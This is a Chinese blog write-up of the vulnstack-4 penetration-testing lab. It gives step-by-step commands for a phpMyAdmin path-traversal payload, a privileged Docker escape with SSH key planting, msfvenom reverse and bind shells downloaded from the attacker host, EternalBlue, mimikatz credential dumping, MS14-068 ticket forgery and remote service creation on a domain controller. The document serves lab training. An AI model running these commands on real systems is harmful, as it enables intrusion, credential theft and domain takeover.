渗透靶场--vulnstack-红队评估实战(4)

最新推荐文章于 2024-10-06 11:26:47 发布
最新推荐文章于 2024-10-06 11:26:47 发布
阅读量784 收藏 2
点赞数
分类专栏: 渗透靶场 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/118930633
版权
该博客详细记录了一次红队评估的过程,从信息搜集开始,利用Web服务器上的漏洞(如Struts2、Tomcat等)进行渗透,通过docker逃逸获取宿主机权限,然后在内网中进行横向移动和权限提升。最终,通过mimikatz泄露密码并利用ms14-068进行域权限提升,实现了对域控的完全控制。
摘要由CSDN通过智能技术生成

vulnstack-红队评估实战(4)

环境配置

web服务器
ubuntu:ubuntu
内网192.168.183.131
外网192.168.154.137
web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613
sudo su
ubuntu
cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
docker-compose up

域成员机器
douser:Dotest123
192.168.183.128

域控
administrator:Test2021(密码过期修改的)
192.168.183.130

kali攻击机
192.168.154.129

image-20210719084121758

1.对web服务器信息搜集

ip进行端口扫描

image-20210719084320568

image-20210719084328098

知道2001,2002,2003分别开放了三个web服务

2001端口

访问通过title可以看出中间件为struts2,工具检测存在s2-045和s2-046

image-20210719084845021

但是s2-045没有成功利用,s2-046成功利用

image-20210719085826030

2002端口

访问知道tomcat 8.5.19,vulmap扫描出目标

image-20210719090144511

成功利用

image-20210719090344211

2003端口

访问是一个phpmyadmin(无需登录),版本 4.8.1 存在一个任意文件包含漏洞

复现:

在index.php后添加?target=db_sql.php%3f/../../../../../../../../etc/passwd

image-20210719101037596

2.进行docker逃逸

概念

严重安全漏洞(CVE-2019-5736),导致18.09.2版本之前的Docker允许恶意容器覆盖宿主机上的runC二进制文件,由此使攻击者能够以root身份在宿主机上执行任意命令。恶意容器需满足以下两个条件之一:

(1)由一个攻击者控制的恶意镜像创建
(2)攻击者具有某已存在容器的写权限,且可通过docker exec进入
docker逃逸在于启动dcoker时加入危险参数--privileged=ture(特权模式),允许容器内的root拥有外部物理机root权限而不是普通权限,本docker容器启动即为特权模式。

当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,使用特权模式启动容器,可以获取大量设备文件访问权限。此外还可以通过写入计划任务等方式在宿主机执行命令。

利用docker的特权模式来在宿主机硬盘中写入ssh私钥,建立用户实现ssh免密登录宿主机,从而实现对目标宿主机的控制。

实现

1.建立test目录,将/dev/sda1 挂载到test 目录

mkdir /test
mount /dev/sda1 /test
ls -alh /test

可以看到test目录中是目标宿主机的根目录

image-20210719103952039

2.再修改宿主机的.ssh文件来实现密钥登录

本地生成ssh密钥

ssh-keygen -f attack

创建authorized_keys文件,权限为id_rsa.pub的权限

cp -avx /test/home/ubuntu/.ssh/id_rsa.pub /test/home/ubuntu/.ssh/authorized_keys

写入attack.pub文件内容到目标宿主机上的认证文件内(/test/home/ubuntu/.ssh/authorized_keys)

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/HfT/jwc+UQhyKbwbQNLk3FmBr/J0gfXaR4MH5yrWH240EVHw4CSvw8jHqxNVucxiDL5W0+wcEtAlm2EfIhVrYCvug+8Aqr6Y3WnZU72qdAYXSnJQ79nISIEsayWxlEvjuYYlHeTHh+51NalYtpI+NG0gjLOZM3+4eiVmF2ccCLetW7F7OHc6tfVo32wA4aa08L4Tt3Om3ZIbMrBa/2yteNGWis/EAteACaJm3fpV/9HGWPvCnNUeSwQA+HvoEzDJY8D+tWZvAEX9gDBIxgCYP7hmGVC5VSHOC9r5I2ArAcQJs/C9AuYpsZaicx7H6HGH2BWqV/iN4/yJoKxQYkArw6KKJC7Pip2TJ2G+m3sHjYt4UdKbc3iViHGQMT59aZuMaxZoBaZrlyQxYvqEjwTrqA+RfnwCf845BnMpbhGcqUZ9xrMJM0ixgWx/hiGF43g+9hYVaPGz1tc5ItqtIvnBp2sCCMqwtfyJiiJyDdRhDmiqdI+rIIL+xxLUBKh6nLE= root@kali' > /test/home/ubuntu/.ssh/authorized_keys

这里由于echo会将重定向符输出,所以写sh文件wget下载执行

python -m SimpleHTTPServer

检查

cat /test/home/ubuntu/.ssh/authorized_keys

image-20210719134334928

密钥登录

ssh -i attack ubuntu@192.168.154.137

成功获得宿主机权限

image-20210719134412631

3.shell转移metersploit

生成shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.154.129 LPORT=4444 -f elf > shell.elf

监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.154.129
run

wget下载执行

wget http://192.168.154.129:8000/shell.elf

image-20210719135138500

4.linux提权

ubuntu,还是CVE-2021-3493提权

image-20210719135617505

5.内网存活主机搜集

挂上代理

添加内网网段

run autoroute -s 192.168.183.0/24

自动添加跳板机上的所有路由

run post/multi/manage/autoroute

使用模块设置sock服务端

use auxiliary/server/socks_proxy
set srvport 7777 
set version 5

先用msf找到存活主机

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.183.0-255
set threads 5
run

结果,发现主机128和130

image-20210719142342567

nmap扫描

proxychains nmap -Pn -sT -sV 192.168.183.128 192.168.183.130 -F

结果,可以看到都开放了445

map scan report for localhost (192.168.183.128)
Host is up (0.096s latency).
Not shown: 90 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: DEMO)
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: TESTWIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for localhost (192.168.183.130)
Host is up (0.99s latency).
Not shown: 91 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-19 06:26:23Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn?
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: demo.com, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: DEMO)
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0

6.横向移动

两个内网ip都开放了445,先尝试ms17_010

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.183.128 192.168.183.130

image-20210719143219066

都可能可以利用,尝试利用,这里代理使用了chisel,msf的代理一直打不进去

setg Proxies socks5:127.0.0.1:1080
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.183.128
set payload windows/x64/meterpreter/bind_tcp
set AutoRunScript post/windows/manage/migrate

打了一年128终于进去了

image-20210719155137597

7.内网信息搜集

为了方便接下来的信息收集,我们需要把当前权限降到普通域用户,因为不是域用户的话是没有权限执行域命令的。

getuid    #查看当前token
use incognito #加载incognito
list_tokens -u #列出AccessToken
impersonate_token "DEMO\douser" #模拟DEMO\douser用户
rev2self   #返回到之前的AccessToken权限

开始搜集

net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域

net user                 查看本机用户列表
net user /domain         查看域用户
net localgroup administrators   查看本地管理员组(通常会有域用户)


net view /domain         查看有几个域
net group "domain admins" /domain  查看域管理员的名字
net group "domain controllers" /domain  查看域控制器机器名(可能有多台)

搜集到的信息

域控机器名WIN-ENS2VR5TR3N
域控管理用户Administrator
域用户 Administrator            douser                   Guest                    krbtgt

ping域控WIN-ENS2VR5TR3N.demo.com得到ip

192.168.183.130

8.域权限提升

这里获得域用户douser的密码有两种方式

  1. ubuntu机器的历史命令histroy

    image-20210719161316985

2.利用mimikatz泄露

load mimikatz
kiwi_cmd  sekurlsa::logonPasswords

image-20210719162004671

然后利用ms14-028进行权限提升

首先切换为douser用户,查看本机用户的id

impersonate_token "DEMO\douser"
whoami /all

得到S-1-5-21-979886063-1111900045-1414766810-1107,利用工具提权

ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
// ms14-068.exe -u 域成员名@域名.com -s 域成员sid -d 域控制器ip地址 -p 域成员密码

image-20210719185250167

生成TGT票据,然后利用mimikatz注入票据

使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器

mimikatz # kerberos::purge         //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc <生成的票据文件>   //将票据注入到内存中

image-20210719185449193

klist查看是否注入成功

image-20210719185556680

登录域控查看目录

net use \\WIN-ENS2VR5TR3N
dir \\WIN-ENS2VR5TR3N\c$

然后构造一个正向的木马文件(因为是代理进入内网的)同时监听

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.154.129 lport=5555 -f exe -o bind.exe

setg proxies socks5:127.0.0.1:1080
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 5555
set rhosts 192.168.183.130
set AutoRunScript post/windows/manage/migrate
run

生成后上传到win7,然后通过smb文件共享来讲木马文件复制到域控C盘

upload bind.exe C:\
copy c:\bind.exe \\WIN-ENS2VR5TR3N\c$

利用sc创建服务来执行木马文件

sc \\WIN-ENS2VR5TR3N create bindshell binpath= "c:\bind.exe"
sc \\WIN-ENS2VR5TR3N start bindshell

附:关闭防火墙

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start unablefirewall

image-20210720090958362

拿下!

image-20210720091100602

6ri9ht
关注
专栏目录
vulnstack域环境靶场(四)
BROTHERYY的博客
12-09 1512
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
[渗透测试]Vulnstack 红队(四)
cosmoslin的博客
04-03 543
环境配置 网络拓扑图(仅供参考) 账号信息: web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 ip信息: 攻击机 IP:192.168.111.5 OS:Kali 靶机 Web IP1:192.168.111.14 IP2:192.168.52.129 OS:Ubuntu DC IP:192.168.183.0/24 OS:Windows Server 2008 PC
内网靶场 | 渗透攻击红队内网域渗透靶场-1(Metasploit)零基础入门到精通,收藏这一篇就够了
最新发布
weixin_57514792的博客
10-06 1811
渗透攻击红队内网域渗透靶场
vulstack红队评估(四)
PANDA墨森的博客
06-21 1748
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118210.html 一、环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu win7: douser:Dotest123 Win2008 DC: administrator:Test2008,因为登陆要修改密码,所以改为了panda666... ②虚拟机网卡设置 ubuntu双网卡模拟内外网: 外网:192.168.1....
红日安全vulnstack-ATT&CK实战系列 红队实战(四)
遇事不决冲冲冲
03-29 8641
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
vulstack红队评估(二)
PANDA墨森的博客
06-20 1581
一、环境搭建: 1、根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX 2、网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相通 内网:10.10.10.80,仅主机模式 ②PC-win7只有内网: 内网:10.10.10.201,仅主机模式 ③win2012-DC只有内网: 内网:10.10.10.10,仅主机模式 启动web服务: 运行C:\Oracle\Middleware\u...
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 2897
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 973
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1725
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
[红日靶场]ATT&CK实战系列——红队实战(—)
Huamang的博客
10-17 956
环境搭建 靶场地址 该靶场给了三台虚拟机 下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019 靶场环境是这样的 web服务器由win7来搞,网络可以按照官方给的配置 但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1 另外两个虚拟机的网络适配器都设置成vm1 NAT的子网是192.168.159.0/24 在win7里面的phpstudy打开服务 成功访问 以上就已经搭建好了环境了 WEB服务渗透 n
ATK&CK1红队评估实战靶场Vulnstack之第一篇环境介绍和搭建
千寻的博客
07-21 955
文章目录靶机介绍靶机下载地址靶机背景靶机实战思路一、环境搭建二、漏洞利用三、内网搜集四、横向移动五、构建通道六、持久控制七、痕迹清理靶机环境拓扑环境搭建靶机环境地址WEB服务器:windows7系统域成员:windows server 2003系统![在这里插入图片描述](https://img-blog.csdnimg.cn/img_convert/fa957b0ccc538bf989301bbf270eda7c.png)域控服务器:windows server 2008系统攻击机器:kali 2021环
vulnstack4靶场笔记
orange777
02-05 2159
0x01 实验环境 目标端 ubuntu IP1: 192.168.157.128 IP2: 192.168.183.128 ubuntu:ubuntu win7 IP: 192.168.183.129 douser:Dotest123 DC IP: 192.168.183.130 administrator:Test2008 攻击端 windows7 192.168.157.129 kali 192.168.157.130 0x01 渗透测试 首先需要进入ubuntu开启服务,
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1796
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
红日安全ATT&CK靶机实战系列之vulnstack4
黑白的博客
04-25 9951
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
vulnstack4
m0_70782241的博客
02-23 1299
docker逃逸,域渗透
一次极其曲折的多层靶场渗透--渗透攻击红队靶场
include_voidmain的博客
11-03 670
一次极其曲折的多层靶场渗透--渗透攻击红队靶场
Vulnstack(四)
干铮的博客
05-24 1112
靶场拓扑 下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 用的是VMware workstation 所以可能出现一些错误 Docker环境启动的是Vulhub的在线三个靶机 1.信息收集 主机发现 sudo netdiscover -i eth1 -r 192.168.157.0/24 端口扫描 nmap -A 192.168.53.128 -p- -oN nmap.a 2.apacheput文件上传脚本..
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 4334
红队靶场内网渗透(从DMZ主机渗透到域内机器)
靶场vulnstack4的搭建
weixin_71169068的博客
11-17 781
搭建靶场vulnstack4
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值